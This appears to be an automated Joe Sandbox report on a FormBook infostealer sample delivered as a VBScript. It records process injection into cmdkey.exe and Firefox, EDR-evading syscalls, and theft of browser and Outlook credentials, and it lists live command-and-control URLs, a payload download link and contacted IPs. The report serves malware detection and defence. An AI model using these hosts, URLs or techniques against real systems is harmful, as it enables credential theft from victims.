        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtQueryAttributesFile: Direct from: 0x77402D8CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtSetInformationThread: Direct from: 0x77402A6CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtCreateKey: Direct from: 0x77402B8CJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtClose: Direct from: 0x77402A8C
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeNtProtectVirtualMemory: Direct from: 0x77402EBCJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: NULL target: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\x.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\cmdkey.exeThread register set: target process: 6656Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\cmdkey.exeThread APC queued: target process: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_004034CE
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeDirectory queried: number of queries: 1001

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information121
        Scripting        		Valid Accounts1
        Native API        		121
        Scripting        		1
        Abuse Elevation Control Mechanism        		1
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		12
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory14
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Access Token Manipulation        		4
        Obfuscated Files or Information        		Security Account Manager121
        Security Software Discovery        		SMB/Windows Admin Shares1
        Email Collection        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
        Process Injection        		1
        DLL Side-Loading        		NTDS2
        Virtualization/Sandbox Evasion        		Distributed Component Object ModelInput Capture5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Virtualization/Sandbox Evasion        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Access Token Manipulation        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
        Process Injection        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499548 Sample: #U5831#U50f9#U8acb#U6c42 - ... Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 39 www.518729.xyz 2->39 41 www.sedezne-blazine.shop 2->41 43 21 other IPs or domains 2->43 59 Suricata IDS alerts for network traffic 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Multi AV Scanner detection for submitted file 2->63 67 3 other signatures 2->67 11 wscript.exe 2 2->11         started        signatures3 65 Performs DNS queries to domains with low reputation 39->65 process4 file5 35 C:\Users\user\AppData\Local\Temp\x.exe, PE32 11->35 dropped 83 Benign windows process drops PE files 11->83 85 VBScript performs obfuscated calls to suspicious functions 11->85 87 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->87 15 x.exe 3 32 11->15         started        signatures6 process7 file8 37 C:\Users\user\AppData\Local\...\System.dll, PE32 15->37 dropped 53 Antivirus detection for dropped file 15->53 55 Found stalling execution ending in API Sleep call 15->55 57 Switches to a custom stack to bypass stack traces 15->57 19 x.exe 6 15->19         started        signatures9 process10 dnsIp11 45 groupriam.com 199.103.62.205, 443, 49840 CIRRUSTECHLTDCA Canada 19->45 69 Maps a DLL or memory area into another process 19->69 23 kCwueywDTS.exe 19->23 injected signatures12 process13 signatures14 71 Maps a DLL or memory area into another process 23->71 73 Found direct / indirect Syscall (likely to bypass EDR) 23->73 26 cmdkey.exe 13 23->26         started        process15 signatures16 75 Tries to steal Mail credentials (via file / registry access) 26->75 77 Tries to harvest and steal browser information (history, passwords, etc) 26->77 79 Modifies the context of a thread in another process (thread injection) 26->79 81 3 other signatures 26->81 29 kCwueywDTS.exe 26->29 injected 33 firefox.exe 26->33         started        process17 dnsIp18 47 www.bullbord.top 203.161.46.205, 49862, 49863, 49864 VNPT-AS-VNVNPTCorpVN Malaysia 29->47 49 www.home-check.shop 185.230.15.3, 49874, 49875, 49876 VIALIS-MOSELLELocatedinMetzFranceFR Germany 29->49 51 11 other IPs or domains 29->51 89 Found direct / indirect Syscall (likely to bypass EDR) 29->89 signatures19

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs12%VirustotalBrowse
        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs11%ReversingLabs

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1305039
        C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        www.ayypromo.shop0%VirustotalBrowse
        www.cannulafactory.top1%VirustotalBrowse
        www.meetfactory.biz3%VirustotalBrowse
        www.home-check.shop0%VirustotalBrowse
        www.magicface.shop0%VirustotalBrowse
        7ddw.top0%VirustotalBrowse
        natroredirect.natrocdn.com0%VirustotalBrowse
        www.518729.xyz2%VirustotalBrowse
        multfiber.net0%VirustotalBrowse
        www.foundation-repair.biz0%VirustotalBrowse
        www.7ddw.top0%VirustotalBrowse
        www.groupriam.com1%VirustotalBrowse
        www.multfiber.net0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.asa-malukuutara.com/21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb0%Avira URL Cloudsafe
        http://www.cannulafactory.top/y82c/?wXB=brv4Erb&ij60MtY=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M=0%Avira URL Cloudsafe
        http://www.foundation-repair.biz/enra/0%Avira URL Cloudsafe
        http://www.foundation-repair.biz/enra/?wXB=brv4Erb&ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=0%Avira URL Cloudsafe
        http://www.home-check.shop/ns8q/?ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=&tvodg=2Zld-RLxEfN0%Avira URL Cloudsafe
        http://www.ayypromo.shop/mktg/?ij60MtY=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&wXB=brv4Erb0%Avira URL Cloudsafe
        http://www.meetfactory.biz/o0e7/?ij60MtY=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&wXB=brv4Erb0%Avira URL Cloudsafe
        http://www.cachsoicautdtc.best/fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb0%Avira URL Cloudsafe
        http://www.518729.xyz/s1mg/?ij60MtY=2QViuhW/NYaw5nxi+F1oVZq46szrrR71oUxOni/Qn+PFEj/1SakqFOMu9uwTuSiQaklPQGQrKMR1DX8jJ/FrQ8LNcsmQ9XMkBTdB/FoVvRnsRxC4QNxtOLg=&wXB=brv4Erb0%Avira URL Cloudsafe
        http://www.7ddw.top/pcjw/?ij60MtY=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&wXB=brv4Erb0%Avira URL Cloudsafe
        http://www.emeluzunmoda.online/c0kl/0%Avira URL Cloudsafe
        http://www.518729.xyz/s1mg/0%Avira URL Cloudsafe
        http://www.home-check.shop/ns8q/?wXB=brv4Erb&ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=0%Avira URL Cloudsafe
        http://www.bullbord.top/veti/0%Avira URL Cloudsafe
        http://www.asa-malukuutara.com/21hf/0%Avira URL Cloudsafe
        http://www.home-check.shop/ns8q/0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
        http://www.meetfactory.biz/o0e7/0%Avira URL Cloudsafe
        http://www.itemfilterhub.shop/p1v4/0%Avira URL Cloudsafe
        http://www.bullbord.top/veti/?ij60MtY=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&wXB=brv4Erb0%Avira URL Cloudsafe
        http://www.7ddw.top/pcjw/0%Avira URL Cloudsafe
        https://www.groupriam.com/EiopsiA213.bin0%Avira URL Cloudsafe
        http://www.cachsoicautdtc.best/fp5q/0%Avira URL Cloudsafe
        http://www.magicface.shop/gir9/?ij60MtY=f5fgxEQYyH9aCEvnqRNhj/uGI07axwFwhdkCg+bZ+BEtnM1/7SlBYCrjg9utQFPLrd0Y68zwkqIMf6pHdwjKMQmtDey6vcSJt3zCtqxSD+6F6gKu0jTr2I8=&wXB=brv4Erb0%Avira URL Cloudsafe
        http://www.magicface.shop/gir9/0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_Error0%VirustotalBrowse
        http://www.emeluzunmoda.online/c0kl/?wXB=brv4Erb&ij60MtY=AxZR1MxN1yP04/KkfJjqNmRSK4d8g2rgChYpgYbN8LwS/ds0321h0MeEKpKCay63h/JFzZR/nOfV69IulQUTnqrvqwrwGbRyvD357dhiEinhnUxdss5AyLg=0%Avira URL Cloudsafe
        http://www.foundation-repair.biz/enra/?ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=&wXB=brv4Erb0%Avira URL Cloudsafe
        http://www.ayypromo.shop/mktg/0%Avira URL Cloudsafe
        http://www.cannulafactory.top/y82c/0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.itemfilterhub.shop
        		172.67.166.145
        		truetrue
          		unknown
          www.ayypromo.shop
          		176.57.64.102
          		truetrueunknown
          www.hypepgbet.online
          		82.112.244.92
          		truefalse
            		unknown
            www.cannulafactory.top
            		18.183.3.45
            		truetrueunknown
            www.bullbord.top
            		203.161.46.205
            		truetrue
              		unknown
              www.meetfactory.biz
              		96.126.123.244
              		truetrueunknown
              www.home-check.shop
              		185.230.15.3
              		truetrueunknown
              www.magicface.shop
              		76.223.54.146
              		truetrueunknown
              natroredirect.natrocdn.com
              		85.159.66.93
              		truetrueunknown
              7ddw.top
              		154.23.184.207
              		truetrueunknown
              asa-malukuutara.com
              		103.247.8.53
              		truetrue
                		unknown
                www.cachsoicautdtc.best
                		172.67.191.241
                		truetrue
                  		unknown
                  groupriam.com
                  		199.103.62.205
                  		truefalse
                    		unknown
                    www.518729.xyz
                    		23.231.158.3
                    		truetrueunknown
                    www.foundation-repair.biz
                    		199.59.243.226
                    		truetrueunknown
                    multfiber.net
                    		84.32.84.32
                    		truetrueunknown
                    www.multfiber.net
                    		unknown
                    		unknowntrueunknown
                    www.sedezne-blazine.shop
                    		unknown
                    		unknowntrue
                      		unknown
                      www.7ddw.top
                      		unknown
                      		unknowntrueunknown
                      www.emeluzunmoda.online
                      		unknown
                      		unknowntrue
                        		unknown
                        www.groupriam.com
                        		unknown
                        		unknowntrueunknown
                        www.asa-malukuutara.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.foundation-repair.biz/enra/?wXB=brv4Erb&ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.cannulafactory.top/y82c/?wXB=brv4Erb&ij60MtY=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M=true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.asa-malukuutara.com/21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erbtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.home-check.shop/ns8q/?ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=&tvodg=2Zld-RLxEfNtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.foundation-repair.biz/enra/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ayypromo.shop/mktg/?ij60MtY=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&wXB=brv4Erbtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.meetfactory.biz/o0e7/?ij60MtY=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&wXB=brv4Erbtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.cachsoicautdtc.best/fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erbtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.518729.xyz/s1mg/?ij60MtY=2QViuhW/NYaw5nxi+F1oVZq46szrrR71oUxOni/Qn+PFEj/1SakqFOMu9uwTuSiQaklPQGQrKMR1DX8jJ/FrQ8LNcsmQ9XMkBTdB/FoVvRnsRxC4QNxtOLg=&wXB=brv4Erbtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.7ddw.top/pcjw/?ij60MtY=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&wXB=brv4Erbtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.emeluzunmoda.online/c0kl/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.518729.xyz/s1mg/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.home-check.shop/ns8q/?wXB=brv4Erb&ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.bullbord.top/veti/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.asa-malukuutara.com/21hf/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.home-check.shop/ns8q/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.meetfactory.biz/o0e7/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.itemfilterhub.shop/p1v4/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.bullbord.top/veti/?ij60MtY=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&wXB=brv4Erbtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.7ddw.top/pcjw/true
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.groupriam.com/EiopsiA213.binfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.cachsoicautdtc.best/fp5q/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.magicface.shop/gir9/?ij60MtY=f5fgxEQYyH9aCEvnqRNhj/uGI07axwFwhdkCg+bZ+BEtnM1/7SlBYCrjg9utQFPLrd0Y68zwkqIMf6pHdwjKMQmtDey6vcSJt3zCtqxSD+6F6gKu0jTr2I8=&wXB=brv4Erbtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.magicface.shop/gir9/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.emeluzunmoda.online/c0kl/?wXB=brv4Erb&ij60MtY=AxZR1MxN1yP04/KkfJjqNmRSK4d8g2rgChYpgYbN8LwS/ds0321h0MeEKpKCay63h/JFzZR/nOfV69IulQUTnqrvqwrwGbRyvD357dhiEinhnUxdss5AyLg=true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.foundation-repair.biz/enra/?ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=&wXB=brv4Erbtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ayypromo.shop/mktg/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.cannulafactory.top/y82c/true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nsis.sf.net/NSIS_Errorx.exefalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.230.15.3
                          		www.home-check.shopGermany
                          		42487VIALIS-MOSELLELocatedinMetzFranceFRtrue
                          176.57.64.102
                          		www.ayypromo.shopBosnia and Herzegowina
                          		47959TELINEABAtrue
                          199.103.62.205
                          		groupriam.comCanada
                          		36218CIRRUSTECHLTDCAfalse
                          18.183.3.45
                          		www.cannulafactory.topUnited States
                          		16509AMAZON-02UStrue
                          76.223.54.146
                          		www.magicface.shopUnited States
                          		16509AMAZON-02UStrue
                          23.231.158.3
                          		www.518729.xyzUnited States
                          		20248TAKE2UStrue
                          199.59.243.226
                          		www.foundation-repair.bizUnited States
                          		395082BODIS-NJUStrue
                          103.247.8.53
                          		asa-malukuutara.comIndonesia
                          		58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDtrue
                          154.23.184.207
                          		7ddw.topUnited States
                          		174COGENT-174UStrue
                          85.159.66.93
                          		natroredirect.natrocdn.comTurkey
                          		34619CIZGITRtrue
                          96.126.123.244
                          		www.meetfactory.bizUnited States
                          		63949LINODE-APLinodeLLCUStrue
                          172.67.191.241
                          		www.cachsoicautdtc.bestUnited States
                          		13335CLOUDFLARENETUStrue
                          203.161.46.205
                          		www.bullbord.topMalaysia
                          		45899VNPT-AS-VNVNPTCorpVNtrue
                          172.67.166.145
                          		www.itemfilterhub.shopUnited States
                          		13335CLOUDFLARENETUStrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1499548
                          Start date and time:2024-08-27 07:54:15 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 18m 45s
                          Hypervisor based Inspection enabled:false
